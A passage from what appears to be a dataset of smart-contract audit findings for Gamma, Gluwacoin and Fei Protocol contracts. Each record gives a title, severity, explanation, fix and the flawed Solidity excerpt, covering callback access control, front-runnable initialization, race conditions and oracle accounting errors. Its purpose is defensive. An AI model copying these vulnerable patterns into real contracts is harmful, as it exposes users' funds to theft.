TickMath.MIN\\_SQRT\\_RATIO + 1 : TickMath.MAX\\_SQRT\\_RATIO - 1,\\n abi.encode(address(this))\\n );\\n}\\n```\\n -Uniswap v3 callbacks access control should be hardenedчlowчResolution\\nFixed in GammaStrategies/[email protected]9a7a3dd by implementing the auditor's recommendation for `uniswapV3MintCallback`, and deleting `uniswapV3SwapCallback` and the call to `pool.swap`.\\nUniswap v3 uses a callback pattern to pull funds from the caller. The caller, (in this case Hypervisor) has to implement a callback function which will be called by the Uniswap's `pool`. Both `uniswapV3MintCallback` and `uniswapV3SwapCallback` restrict the access to the callback functions only for the `pool`. However, this alone will not block a random call from the `pool` contract in case the latter was hacked, which will result in stealing all the funds held in `Hypervisor` or of any user that approved the `Hypervisor` contract to transfer tokens on his behalf.\\n```\\nfunction uniswapV3MintCallback(\\n uint256 amount0,\\n uint256 amount1,\\n bytes calldata data\\n) external override {\\n require(msg.sender == address(pool));\\n address payer = abi.decode(data, (address));\\n\\n if (payer == address(this)) {\\n if (amount0 > 0) token0.safeTransfer(msg.sender, amount0);\\n if (amount1 > 0) token1.safeTransfer(msg.sender, amount1);\\n } else {\\n if (amount0 > 0) token0.safeTransferFrom(payer, msg.sender, amount0);\\n if (amount1 > 0) token1.safeTransferFrom(payer, msg.sender, amount1);\\n }\\n}\\n\\nfunction uniswapV3SwapCallback(\\n int256 amount0Delta,\\n int256 amount1Delta,\\n bytes calldata data\\n) external override {\\n require(msg.sender == address(pool));\\n address payer = abi.decode(data, (address));\\n\\n if (amount0Delta > 0) {\\n if (payer == address(this)) {\\n token0.safeTransfer(msg.sender, uint256(amount0Delta));\\n } else {\\n token0.safeTransferFrom(payer, msg.sender, uint256(amount0Delta));\\n }\\n } else if (amount1Delta > 0) {\\n if (payer == address(this)) {\\n 
token1.safeTransfer(msg.sender, uint256(amount1Delta));\\n } else {\\n token1.safeTransferFrom(payer, msg.sender, uint256(amount1Delta));\\n }\\n }\\n}\\n```\\nчConsider adding (boolean) storage variables that will help to track whether a call to `uniswapV3MintCallback | uniswapV3SwapCallback` was preceded by a call to `_mintLiquidity | rebalance` respectively. An example for the `rebalance` function would be bool `rebalanceCalled`, this variable will be assigned a `true` value in `rebalance` before the external call of `pool.swap`, then `uniswapV3SwapCallback` will require that `rebalanceCalled` == `true`, and then right after `rebalanceCalled` will be assigned a `false` value.чч```\\nfunction uniswapV3MintCallback(\\n uint256 amount0,\\n uint256 amount1,\\n bytes calldata data\\n) external override {\\n require(msg.sender == address(pool));\\n address payer = abi.decode(data, (address));\\n\\n if (payer == address(this)) {\\n if (amount0 > 0) token0.safeTransfer(msg.sender, amount0);\\n if (amount1 > 0) token1.safeTransfer(msg.sender, amount1);\\n } else {\\n if (amount0 > 0) token0.safeTransferFrom(payer, msg.sender, amount0);\\n if (amount1 > 0) token1.safeTransferFrom(payer, msg.sender, amount1);\\n }\\n}\\n\\nfunction uniswapV3SwapCallback(\\n int256 amount0Delta,\\n int256 amount1Delta,\\n bytes calldata data\\n) external override {\\n require(msg.sender == address(pool));\\n address payer = abi.decode(data, (address));\\n\\n if (amount0Delta > 0) {\\n if (payer == address(this)) {\\n token0.safeTransfer(msg.sender, uint256(amount0Delta));\\n } else {\\n token0.safeTransferFrom(payer, msg.sender, uint256(amount0Delta));\\n }\\n } else if (amount1Delta > 0) {\\n if (payer == address(this)) {\\n token1.safeTransfer(msg.sender, uint256(amount1Delta));\\n } else {\\n token1.safeTransferFrom(payer, msg.sender, uint256(amount1Delta));\\n }\\n }\\n}\\n```\\n -UniProxy.depositSwap doesn't deposit all the users' fundsчmediumчResolution\\nFixed in 
GammaStrategies/[email protected]9a7a3dd by deleting the `depositSwap` function.\\nWhen executing the swap, the minimal amount out is passed to the router (deposit1 in this example), but the actual swap amount will be `amountOut`. But after the trade, instead of depositing `amountOut`, the contract tries to deposit `deposit1`, which is lower. This may result in some users' funds staying in the `UniProxy` contract.\\n```\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n\\nrequire(amountOut > 0, \"Swap failed\");\\n\\nif (positions[pos].version < 2) {\\n // requires lp token transfer from proxy to msg.sender\\n shares = IHypervisor(pos).deposit(deposit0, deposit1, address(this));\\n IHypervisor(pos).transfer(to, shares);\\n}\\n```\\nчDeposit all the user's funds to the Hypervisor.чч```\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n\\nrequire(amountOut > 0, \"Swap failed\");\\n\\nif (positions[pos].version < 2) {\\n // requires lp token transfer from proxy to msg.sender\\n shares = IHypervisor(pos).deposit(deposit0, deposit1, address(this));\\n IHypervisor(pos).transfer(to, shares);\\n}\\n```\\n -Initialization flawsчlowчFor non-upgradeable contracts, the Solidity compiler takes care of chaining the constructor calls of an inheritance hierarchy in the right order; for upgradeable contracts, taking care of initialization is a manual task - and with extensive use of inheritance, it is tedious and error-prone. 
The convention in OpenZeppelin Contracts Upgradeable is to have a `__C_init_unchained` function that contains the actual initialization logic for contract `C` and a `__C_init` function that calls the `*_init_unchained` function for every super-contract - direct and indirect - in the inheritance hierarchy (including C) in the C3-linearized order from most basic to most derived. This pattern imitates what the compiler does for constructors.\\nAll `*_init` functions in the contracts (__ERC20WrapperGluwacoin_init, `__ERC20Reservable_init`, `__ERC20ETHless_init`, and __ERC20Wrapper_init) are missing some `_init_unchained` calls, and sometimes the existing calls are not in the correct order.\\nThe `__ERC20WrapperGluwacoin_init` function is implemented as follows:\\n```\\nfunction \\_\\_ERC20WrapperGluwacoin\\_init(\\n string memory name,\\n string memory symbol,\\n IERC20 token\\n) internal initializer {\\n \\_\\_Context\\_init\\_unchained();\\n \\_\\_ERC20\\_init\\_unchained(name, symbol);\\n \\_\\_ERC20ETHless\\_init\\_unchained();\\n \\_\\_ERC20Reservable\\_init\\_unchained();\\n \\_\\_AccessControlEnumerable\\_init\\_unchained();\\n \\_\\_ERC20Wrapper\\_init\\_unchained(token);\\n \\_\\_ERC20WrapperGluwacoin\\_init\\_unchained();\\n}\\n```\\n\\nAnd the C3 linearization is:\\n```\\nERC20WrapperGluwacoin\\n ↖ ERC20Reservable\\n ↖ ERC20ETHless\\n ↖ ERC20Wrapper\\n ↖ ERC20Upgradeable\\n ↖ IERC20MetadataUpgradeable\\n ↖ IERC20Upgradeable\\n ↖ AccessControlEnumerableUpgradeable\\n ↖ AccessControlUpgradeable\\n ↖ ERC165Upgradeable\\n ↖ IERC165Upgradeable\\n ↖ IAccessControlEnumerableUpgradeable\\n ↖ IAccessControlUpgradeable\\n ↖ ContextUpgradeable\\n ↖ Initializable\\n```\\n\\nThe calls `__ERC165_init_unchained();` and `__AccessControl_init_unchained();` are missing, and `__ERC20Wrapper_init_unchained(token);` should move between `__ERC20_init_unchained(name, symbol);` and `__ERC20ETHless_init_unchained();`.чReview all `*_init` functions, add the missing `*_init_unchained` 
calls, and fix the order of these calls.чч```\\nfunction \\_\\_ERC20WrapperGluwacoin\\_init(\\n string memory name,\\n string memory symbol,\\n IERC20 token\\n) internal initializer {\\n \\_\\_Context\\_init\\_unchained();\\n \\_\\_ERC20\\_init\\_unchained(name, symbol);\\n \\_\\_ERC20ETHless\\_init\\_unchained();\\n \\_\\_ERC20Reservable\\_init\\_unchained();\\n \\_\\_AccessControlEnumerable\\_init\\_unchained();\\n \\_\\_ERC20Wrapper\\_init\\_unchained(token);\\n \\_\\_ERC20WrapperGluwacoin\\_init\\_unchained();\\n}\\n```\\n -Flaw in _beforeTokenTransfer call chain and missing testsчlowчIn OpenZeppelin's ERC-20 implementation, the virtual `_beforeTokenTransfer` function provides a hook that is called before tokens are transferred, minted, or burned. In the Gluwacoin codebase, it is used to check whether the unreserved balance (as opposed to the regular balance, which is checked by the ERC-20 implementation) of the sender is sufficient to allow this transfer or burning.\\nIn `ERC20WrapperGluwacoin`, `ERC20Reservable`, and `ERC20Wrapper`, the `_beforeTokenTransfer` function is implemented in the following way:\\n```\\nfunction \\_beforeTokenTransfer(\\n address from,\\n address to,\\n uint256 amount\\n) internal override(ERC20Upgradeable, ERC20Wrapper, ERC20Reservable) {\\n ERC20Wrapper.\\_beforeTokenTransfer(from, to, amount);\\n ERC20Reservable.\\_beforeTokenTransfer(from, to, amount);\\n}\\n```\\n\\n```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal virtual override (ERC20Upgradeable) {\\n if (from != address(0)) {\\n require(\\_unreservedBalance(from) >= amount, \"ERC20Reservable: transfer amount exceeds unreserved balance\");\\n }\\n\\n super.\\_beforeTokenTransfer(from, to, amount);\\n}\\n```\\n\\n```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal virtual override (ERC20Upgradeable) {\\n super.\\_beforeTokenTransfer(from, to, amount);\\n}\\n```\\n\\nFinally, the C3-linearization of 
the contracts is:\\n```\\nERC20WrapperGluwacoin\\n ↖ ERC20Reservable\\n ↖ ERC20ETHless\\n ↖ ERC20Wrapper\\n ↖ ERC20Upgradeable\\n ↖ IERC20MetadataUpgradeable\\n ↖ IERC20Upgradeable\\n ↖ AccessControlEnumerableUpgradeable\\n ↖ AccessControlUpgradeable\\n ↖ ERC165Upgradeable\\n ↖ IERC165Upgradeable\\n ↖ IAccessControlEnumerableUpgradeable\\n ↖ IAccessControlUpgradeable\\n ↖ ContextUpgradeable\\n ↖ Initializable\\n```\\n\\nThis means `ERC20Wrapper._beforeTokenTransfer` is ultimately called twice - once directly in `ERC20WrapperGluwacoin._beforeTokenTransfer` and then a second time because the `super._beforeTokenTransfer` call in `ERC20Reservable._beforeTokenTransfer` resolves to `ERC20Wrapper._beforeTokenTransfer`. (ERC20ETHless doesn't override _beforeTokenTransfer.)\\nMoreover, while reviewing the correctness and coverage of the tests is not in scope for this engagement, we happened to notice that there are no tests that check whether the unreserved balance is sufficient for transferring or burning tokens.ч`ERC20WrapperGluwacoin._beforeTokenTransfer` should just call `super._beforeTokenTransfer`. Moreover, the `_beforeTokenTransfer` implementation can be removed from `ERC20Wrapper`.\\nWe would like to stress the importance of careful and comprehensive testing in general and of this functionality in particular, as it is crucial for the system's integrity. We also encourage investigating whether there are more such omissions and an evaluation of the test quality and coverage in general.чч```\\nfunction \\_beforeTokenTransfer(\\n address from,\\n address to,\\n uint256 amount\\n) internal override(ERC20Upgradeable, ERC20Wrapper, ERC20Reservable) {\\n ERC20Wrapper.\\_beforeTokenTransfer(from, to, amount);\\n ERC20Reservable.\\_beforeTokenTransfer(from, to, amount);\\n}\\n```\\n -Hard-coded decimalsчlowчThe Gluwacoin wrapper token should have the same number of decimals as the wrapped ERC-20. Currently, the number of decimals is hard-coded to 6. 
This limits flexibility or requires source code changes and recompilation if a token with a different number of decimals is to be wrapped.\\n```\\nfunction decimals() public pure override returns (uint8) {\\n return 6;\\n}\\n```\\nчWe recommend supplying the number of `decimals` as an initialization parameter and storing it in a state variable. That increases gas consumption of the `decimals` function, but we doubt this view function will be frequently called from a contract, and even if it was, we think the benefits far outweigh the costs.\\nMoreover, we believe the `decimals` logic (i.e., function `decimals` and the new state variable) should be implemented in the `ERC20Wrapper` contract - which holds the basic ERC-20 functionality of the wrapper token - and not in `ERC20WrapperGluwacoin`, which is the base contract of the entire system.чч```\\nfunction decimals() public pure override returns (uint8) {\\n return 6;\\n}\\n```\\n -Re-initialization of the Balancer pool is potentially possibleчlowчInstead of creating a new Balancer pool for an auction every time, the same pool is getting re-used repeatedly. When this happens, the old liquidity is withdrawn, and if there is enough FEI in the contract, the weights are shifted and the pool is filled with new tokens. If there is not enough FEI, the pool is left empty, and users can still interact with it. When there's enough FEI again, it's re-initialized again, which is not the intention:\\n```\\nuint256 bptTotal = pool.totalSupply();\\nuint256 bptBalance = pool.balanceOf(address(this));\\n\\n// Balancer locks a small amount of bptTotal after init, so 0 bpt means pool needs initializing\\nif (bptTotal == 0) {\\n \\_initializePool();\\n return;\\n}\\n```\\n\\nTheoretically, this will never happen because there should be minimal leftover liquidity tokens after the withdrawal. 
But we couldn't strictly verify that fact because it requires looking into balancer code much deeper.чOne of the options would be only to allow re-using the pool in atomic transactions. So if there are not enough FEI tokens for the next auction, the `swap` transaction reverts. That will help with another issue (issue 3.2) too.чч```\\nuint256 bptTotal = pool.totalSupply();\\nuint256 bptBalance = pool.balanceOf(address(this));\\n\\n// Balancer locks a small amount of bptTotal after init, so 0 bpt means pool needs initializing\\nif (bptTotal == 0) {\\n \\_initializePool();\\n return;\\n}\\n```\\n -The BalancerLBPSwapper may not have enough Tribe tokensчlowчWhenever the `swap` function is called, it should re-initialize the Balancer pool that requires adding liquidity: 99% Fei and 1% Tribe. So the Tribe should initially be in the contract.\\n```\\nfunction \\_getTokensIn(uint256 spentTokenBalance) internal view returns(uint256[] memory amountsIn) {\\n amountsIn = new uint256[](2);\\n\\n uint256 receivedTokenBalance = readOracle().mul(spentTokenBalance).mul(ONE\\_PERCENT).div(NINETY\\_NINE\\_PERCENT).asUint256();\\n\\n if (address(assets[0]) == tokenSpent) {\\n amountsIn[0] = spentTokenBalance;\\n amountsIn[1] = receivedTokenBalance;\\n } else {\\n amountsIn[0] = receivedTokenBalance;\\n amountsIn[1] = spentTokenBalance;\\n }\\n}\\n```\\n\\nAdditionally, when the `swap` is called, and there is not enough FEI to re-initiate the Balancer auction, all the Tribe gets withdrawn. So the next time the `swap` is called, there is no Tribe in the contract again.\\n```\\n// 5. 
Send remaining tokenReceived to target\\nIERC20(tokenReceived).transfer(tokenReceivingAddress, IERC20(tokenReceived).balanceOf(address(this)));\\n```\\nчCreate an automated mechanism that mints/transfers Tribe when it is needed in the swapper contract.чч```\\nfunction \\_getTokensIn(uint256 spentTokenBalance) internal view returns(uint256[] memory amountsIn) {\\n amountsIn = new uint256[](2);\\n\\n uint256 receivedTokenBalance = readOracle().mul(spentTokenBalance).mul(ONE\\_PERCENT).div(NINETY\\_NINE\\_PERCENT).asUint256();\\n\\n if (address(assets[0]) == tokenSpent) {\\n amountsIn[0] = spentTokenBalance;\\n amountsIn[1] = receivedTokenBalance;\\n } else {\\n amountsIn[0] = receivedTokenBalance;\\n amountsIn[1] = spentTokenBalance;\\n }\\n}\\n```\\n -StableSwapOperatorV1 - resistantFei value is not correct in the resistantBalanceAndFei functionчhighчThe `resistantBalanceAndFei` function of a `PCVDeposit` contract is supposed to return the amount of funds that the contract controls; it is then used to evaluate the total value of PCV (collateral in the protocol). Additionally, this function returns the number of FEI tokens that are protocol-controlled. These FEI tokens are “temporarily minted”; they are not backed up by the collateral and shouldn't be used in calculations that determine the collateralization of the protocol.\\nIdeally, the amount of these FEI tokens should be the same during the deposit, withdrawal, and the `resistantBalanceAndFei` function call. In the `StableSwapOperatorV1` contract, all these values are totally different:\\nduring the deposit, the amount of required FEI tokens is calculated. It's done in a way so the values of FEI and 3pool tokens in the metapool should be equal after the deposit. 
So if there is the initial imbalance of FEI and 3pool tokens, the deposit value of these tokens will be different:\\n```\\n// get the amount of tokens in the pool\\n(uint256 \\_3crvAmount, uint256 \\_feiAmount) = (\\n IStableSwap2(pool).balances(\\_3crvIndex),\\n IStableSwap2(pool).balances(\\_feiIndex)\\n);\\n// // rest of code and the expected amount of 3crv in it after deposit\\nuint256 \\_3crvAmountAfter = \\_3crvAmount + \\_3crvBalanceAfter;\\n \\n// get the usd value of 3crv in the pool\\nuint256 \\_3crvUsdValue = \\_3crvAmountAfter \\* IStableSwap3(\\_3pool).get\\_virtual\\_price() / 1e18;\\n \\n// compute the number of FEI to deposit\\nuint256 \\_feiToDeposit = 0;\\nif (\\_3crvUsdValue > \\_feiAmount) {\\n \\_feiToDeposit = \\_3crvUsdValue - \\_feiAmount;\\n}\\n```\\n\\nduring the withdrawal, the FEI and 3pool tokens are withdrawn in the same proportion as they are present in the metapool:\\n```\\nuint256[2] memory \\_minAmounts; // [0, 0]\\nIERC20(pool).approve(pool, \\_lpToWithdraw);\\nuint256 \\_3crvBalanceBefore = IERC20(\\_3crv).balanceOf(address(this));\\nIStableSwap2(pool).remove\\_liquidity(\\_lpToWithdraw, \\_minAmounts);\\n```\\n\\nin the `resistantBalanceAndFei` function, the value of protocol-controlled FEI tokens and the value of 3pool tokens deposited are considered equal:\\n```\\nresistantBalance = \\_lpPriceUSD / 2;\\nresistantFei = resistantBalance;\\n```\\n\\nSome of these values may be equal under some circumstances, but that is not enforced. 
After one of the steps (deposit or withdrawal), the total PCV value and collateralization may be changed significantly.чMake sure that deposit, withdrawal, and the `resistantBalanceAndFei` are consistent and won't instantly change the PCV value significantly.чч```\\n// get the amount of tokens in the pool\\n(uint256 \\_3crvAmount, uint256 \\_feiAmount) = (\\n IStableSwap2(pool).balances(\\_3crvIndex),\\n IStableSwap2(pool).balances(\\_feiIndex)\\n);\\n// // rest of code and the expected amount of 3crv in it after deposit\\nuint256 \\_3crvAmountAfter = \\_3crvAmount + \\_3crvBalanceAfter;\\n \\n// get the usd value of 3crv in the pool\\nuint256 \\_3crvUsdValue = \\_3crvAmountAfter \\* IStableSwap3(\\_3pool).get\\_virtual\\_price() / 1e18;\\n \\n// compute the number of FEI to deposit\\nuint256 \\_feiToDeposit = 0;\\nif (\\_3crvUsdValue > \\_feiAmount) {\\n \\_feiToDeposit = \\_3crvUsdValue - \\_feiAmount;\\n}\\n```\\n -CollateralizationOracle - Fei in excluded deposits contributes to userCirculatingFeiчhighч`CollateralizationOracle.pcvStats` iterates over all deposits, queries the resistant balance and FEI for each deposit, and accumulates the total value of the resistant balances and the total resistant FEI. Any Guardian or Governor can exclude (and re-include) a deposit that has become problematic in some way, for example, because it is reporting wrong numbers. Finally, the `pcvStats` function computes the `userCirculatingFei` as the total FEI supply minus the accumulated resistant FEI balances; the idea here is to determine the amount of “free” FEI, or FEI that is not PCV. However, the FEI balances from excluded deposits contribute to the `userCirculatingFei`, although they are clearly not “free” FEI. 
That leads to a wrong `protocolEquity` and a skewed collateralization ratio and might therefore have a significant impact on the economics of the system.\\nIt should be noted that even the exclusion from the total PCV leads to a `protocolEquity` and a collateralization ratio that could be considered skewed (again, it might depend on the exact reasons for exclusion), but “adding” the missing FEI to the `userCirculatingFei` distorts these numbers even more.\\nIn the extreme scenario that all deposits have been excluded, the entire Fei supply is currently reported as `userCirculatingFei`.\\n```\\n/// @notice returns the Protocol-Controlled Value, User-circulating FEI, and\\n/// Protocol Equity.\\n/// @return protocolControlledValue : the total USD value of all assets held\\n/// by the protocol.\\n/// @return userCirculatingFei : the number of FEI not owned by the protocol.\\n/// @return protocolEquity : the difference between PCV and user circulating FEI.\\n/// If there are more circulating FEI than $ in the PCV, equity is 0.\\n/// @return validityStatus : the current oracle validity status (false if any\\n/// of the oracles for tokens held in the PCV are invalid, or if\\n/// this contract is paused).\\nfunction pcvStats() public override view returns (\\n uint256 protocolControlledValue,\\n uint256 userCirculatingFei,\\n int256 protocolEquity,\\n bool validityStatus\\n) {\\n uint256 \\_protocolControlledFei = 0;\\n validityStatus = !paused();\\n\\n // For each token// rest of code\\n for (uint256 i = 0; i < tokensInPcv.length(); i++) {\\n address \\_token = tokensInPcv.at(i);\\n uint256 \\_totalTokenBalance = 0;\\n\\n // For each deposit// rest of code\\n for (uint256 j = 0; j < tokenToDeposits[\\_token].length(); j++) {\\n address \\_deposit = tokenToDeposits[\\_token].at(j);\\n\\n // ignore deposits that are excluded by the Guardian\\n if (!excludedDeposits[\\_deposit]) {\\n // read the deposit, and increment token balance/protocol fei\\n (uint256 
\\_depositBalance, uint256 \\_depositFei) = IPCVDepositBalances(\\_deposit).resistantBalanceAndFei();\\n \\_totalTokenBalance += \\_depositBalance;\\n \\_protocolControlledFei += \\_depositFei;\\n }\\n }\\n\\n // If the protocol holds non-zero balance of tokens, fetch the oracle price to\\n // increment PCV by \\_totalTokenBalance \\* oracle price USD.\\n if (\\_totalTokenBalance != 0) {\\n (Decimal.D256 memory \\_oraclePrice, bool \\_oracleValid) = IOracle(tokenToOracle[\\_token]).read();\\n if (!\\_oracleValid) {\\n validityStatus = false;\\n }\\n protocolControlledValue += \\_oraclePrice.mul(\\_totalTokenBalance).asUint256();\\n }\\n }\\n\\n userCirculatingFei = fei().totalSupply() - \\_protocolControlledFei;\\n protocolEquity = int256(protocolControlledValue) - int256(userCirculatingFei);\\n}\\n```\\nчIt is unclear how to fix this. One might want to exclude the FEI in excluded deposits entirely from the calculation, but not knowing the amount was the reason to exclude the deposit in the first place.\\nOne option could be to let the entity that excludes a deposit specify substitute values that should be used instead of querying the numbers from the deposit. However, it is questionable whether this approach is practical if the numbers we'd like to see as substitute values change quickly or repeatedly over time. Ultimately, the querying function itself should be fixed. Moreover, as the substitute values can dramatically impact the system economics, we'd only like to trust the Governor with this and not give this permission to a Guardian. 
However, the original intention was to give a role with less trust than the Governor the possibility to react quickly to a deposit that reports wrong numbers; if the exclusion of deposits becomes the Governor's privilege, such a quick and lightweight intervention isn't possible anymore.\\nIndependently, we recommend taking proper care of the situation that all deposits - or just too many - have been excluded, for example, by setting the returned `validityStatus` to `false`, as in this case, there is not enough information to compute the collateralization ratio even as a crude approximation.чч```\\n/// @notice returns the Protocol-Controlled Value, User-circulating FEI, and\\n/// Protocol Equity.\\n/// @return protocolControlledValue : the total USD value of all assets held\\n/// by the protocol.\\n/// @return userCirculatingFei : the number of FEI not owned by the protocol.\\n/// @return protocolEquity : the difference between PCV and user circulating FEI.\\n/// If there are more circulating FEI than $ in the PCV, equity is 0.\\n/// @return validityStatus : the current oracle validity status (false if any\\n/// of the oracles for tokens held in the PCV are invalid, or if\\n/// this contract is paused).\\nfunction pcvStats() public override view returns (\\n uint256 protocolControlledValue,\\n uint256 userCirculatingFei,\\n int256 protocolEquity,\\n bool validityStatus\\n) {\\n uint256 \\_protocolControlledFei = 0;\\n validityStatus = !paused();\\n\\n // For each token// rest of code\\n for (uint256 i = 0; i < tokensInPcv.length(); i++) {\\n address \\_token = tokensInPcv.at(i);\\n uint256 \\_totalTokenBalance = 0;\\n\\n // For each deposit// rest of code\\n for (uint256 j = 0; j < tokenToDeposits[\\_token].length(); j++) {\\n address \\_deposit = tokenToDeposits[\\_token].at(j);\\n\\n // ignore deposits that are excluded by the Guardian\\n if (!excludedDeposits[\\_deposit]) {\\n // read the deposit, and increment token balance/protocol fei\\n (uint256 
\\_depositBalance, uint256 \\_depositFei) = IPCVDepositBalances(\\_deposit).resistantBalanceAndFei();\\n \\_totalTokenBalance += \\_depositBalance;\\n \\_protocolControlledFei += \\_depositFei;\\n }\\n }\\n\\n // If the protocol holds non-zero balance of tokens, fetch the oracle price to\\n // increment PCV by \\_totalTokenBalance \\* oracle price USD.\\n if (\\_totalTokenBalance != 0) {\\n (Decimal.D256 memory \\_oraclePrice, bool \\_oracleValid) = IOracle(tokenToOracle[\\_token]).read();\\n if (!\\_oracleValid) {\\n validityStatus = false;\\n }\\n protocolControlledValue += \\_oraclePrice.mul(\\_totalTokenBalance).asUint256();\\n }\\n }\\n\\n userCirculatingFei = fei().totalSupply() - \\_protocolControlledFei;\\n protocolEquity = int256(protocolControlledValue) - int256(userCirculatingFei);\\n}\\n```\\n -BalancerLBPSwapper - init() can be front-run to potentially steal tokensчmediumчThe deployment process for `BalancerLBPSwapper` appears to be the following:\\ndeploy `BalancerLBPSwapper`.\\nrun `ILiquidityBootstrappingPoolFactory.create()` proving the newly deployed swapper address as the owner of the pool.\\ninitialize `BalancerLBPSwapper.init()` with the address of the newly created pool.\\nThis process may be split across multiple transactions as in the `v2Phase1.js` deployment scenario.\\nBetween step (1) and (3) there is a window of opportunity for someone to maliciously initialize contract. This should be easily detectable because calling `init()` twice should revert the second transaction. If this is not caught in the deployment script this may have more severe security implications. 
Otherwise, this window can be used to grief the deployment by initializing it before the original initializer does, forcing them to redeploy the contract or to steal any tokenSpent/tokenReceived that are owned by the contract at this time.\\nNote: It is assumed that the contract will not own a lot of tokens right after deployment rendering the scenario of stealing tokens more unlikely. However, that highly depends on the deployment script for the contract system.\\n```\\nfunction init(IWeightedPool \\_pool) external {\\n require(address(pool) == address(0), \"BalancerLBPSwapper: initialized\");\\n\\n pool = \\_pool;\\n IVault \\_vault = \\_pool.getVault();\\n\\n vault = \\_vault;\\n\\n // Check ownership\\n require(\\_pool.getOwner() == address(this), \"BalancerLBPSwapper: contract not pool owner\");\\n```\\n\\n```\\nIERC20(tokenSpent).approve(address(\\_vault), type(uint256).max);\\nIERC20(tokenReceived).approve(address(\\_vault), type(uint256).max);\\n```\\nчprotect `BalancerLBPSwapper.init()` and only allow a trusted entity (e.g. the initial deployer) to call this method.чч```\\nfunction init(IWeightedPool \\_pool) external {\\n require(address(pool) == address(0), \"BalancerLBPSwapper: initialized\");\\n\\n pool = \\_pool;\\n IVault \\_vault = \\_pool.getVault();\\n\\n vault = \\_vault;\\n\\n // Check ownership\\n require(\\_pool.getOwner() == address(this), \"BalancerLBPSwapper: contract not pool owner\");\\n```\\n -PCVEquityMinter and BalancerLBPSwapper - desynchronisation raceчmediumчThere is nothing that prevents other actors from calling `BalancerLBPSwapper.swap()` `afterTime` but right before `PCVEquityMinter.mint()` would, as long as the `minAmount` required for the call to pass is deposited to `BalancerLBPSwapper`.\\nBoth the `PCVEquityMinter.mint()` and `BalancerLBPSwapper.swap()` are timed (via the `afterTime` modifier) and are ideally in sync. 
In an ideal world the incentive to call `mint()` would be enough to ensure that both contracts are always in sync, however, a malicious actor might interfere by calling `.swap()` directly, providing the `minAmount` required for the call to pass. This will have two effects:\\ninstead of taking the newly minted FEI from `PCVEquityMinter`, existing FEI from the malicious user will be used with the pool. (instead of inflating the token the malicious actor basically pays for it)\\nthe `Timed` modifiers of both contracts will be out of sync with `BalancerLBPSwapper.swap()` being reset (and failing until it becomes available again) and `PCVEquityMinter.mint()` still being available. Furthermore, keeper-scripts (or actors that want to get the incentive) might continue to attempt to `mint()` while the call will ultimately fail in `.swap()` due to the resynchronization of `timed` (unless they simulate the calls first).\\nNote: There are not a lot of incentives to actually exploit this other than preventing protocol inflation (mint) and potentially griefing users. A malicious user will lose out on the incentivized call and has to ensure that the `minAmount` required for `.swap()` to work is available. 
It is, however, in the best interest of security to defuse the unpredictable racy character of the contract interaction.\\n```\\nfunction \\_afterMint() internal override {\\n IPCVSwapper(target).swap();\\n}\\n```\\n\\n```\\nfunction swap() external override afterTime whenNotPaused {\\n (\\n uint256 spentReserves,\\n uint256 receivedReserves, \\n uint256 lastChangeBlock\\n ) = getReserves();\\n\\n // Ensures no actor can change the pool contents earlier in the block\\n require(lastChangeBlock < block.number, \"BalancerLBPSwapper: pool changed this block\");\\n```\\nчIf `BalancerLBPSwapper.swap()` is only to be called within the flows of action from a `PCVEquityMinter.mint()` it is suggested to authenticate the call and only let `PCVEquityMinter` call `.swap()`чч```\\nfunction \\_afterMint() internal override {\\n IPCVSwapper(target).swap();\\n}\\n```\\n -CollateralizationOracleWrapper - the deviation threshold check in update() always returns falseчmediumчA call to `update()` returns a boolean flag indicating whether the update was performed on outdated data. This flag is being checked in `updateIfOutdated()` which is typically called by an incentivized keeper function.\\nThe `_isExceededDeviationThreshold` calls at the end of the `_update()` function always return `false` as they are comparing the same values (cachedProtocolControlledValue to the `_protocolControlledValue` value and `cachedProtocolControlledValue` has just been set to `_protocolControlledValue` a couple of lines before). `_isExceededDeviationThreshold` will, therefore, never detect a deviation and return `false´.\\nThere may currently be no incentive (e.g. from the keeper side) to call `update()` if the values are not outdated but they deviated too much from the target. 
However, anyone can force an update by calling the non-incentivized public `update()` method instead.\\n```\\n require(\\_validityStatus, \"CollateralizationOracleWrapper: CollateralizationOracle is invalid\");\\n\\n // set cache variables\\n cachedProtocolControlledValue = \\_protocolControlledValue;\\n cachedUserCirculatingFei = \\_userCirculatingFei;\\n cachedProtocolEquity = \\_protocolEquity;\\n\\n // reset time\\n \\_initTimed();\\n\\n // emit event\\n emit CachedValueUpdate(\\n msg.sender,\\n cachedProtocolControlledValue,\\n cachedUserCirculatingFei,\\n cachedProtocolEquity\\n );\\n\\n return outdated\\n || \\_isExceededDeviationThreshold(cachedProtocolControlledValue, \\_protocolControlledValue)\\n || \\_isExceededDeviationThreshold(cachedUserCirculatingFei, \\_userCirculatingFei);\\n}\\n```\\nчAdd unit tests to check for all three return conditions (timed, deviationA, deviationB)\\nMake sure to compare the current to the stored value before updating the cached values when calling `_isExceededDeviationThreshold`.чч```\\n require(\\_validityStatus, \"CollateralizationOracleWrapper: CollateralizationOracle is invalid\");\\n\\n // set cache variables\\n cachedProtocolControlledValue = \\_protocolControlledValue;\\n cachedUserCirculatingFei = \\_userCirculatingFei;\\n cachedProtocolEquity = \\_protocolEquity;\\n\\n // reset time\\n \\_initTimed();\\n\\n // emit event\\n emit CachedValueUpdate(\\n msg.sender,\\n cachedProtocolControlledValue,\\n cachedUserCirculatingFei,\\n cachedProtocolEquity\\n );\\n\\n return outdated\\n || \\_isExceededDeviationThreshold(cachedProtocolControlledValue, \\_protocolControlledValue)\\n || \\_isExceededDeviationThreshold(cachedUserCirculatingFei, \\_userCirculatingFei);\\n}\\n```\\n -ChainlinkOracleWrapper - latestRoundData might return stale resultsчmediumчThe oracle wrapper calls out to a chainlink oracle receiving the `latestRoundData()`. 
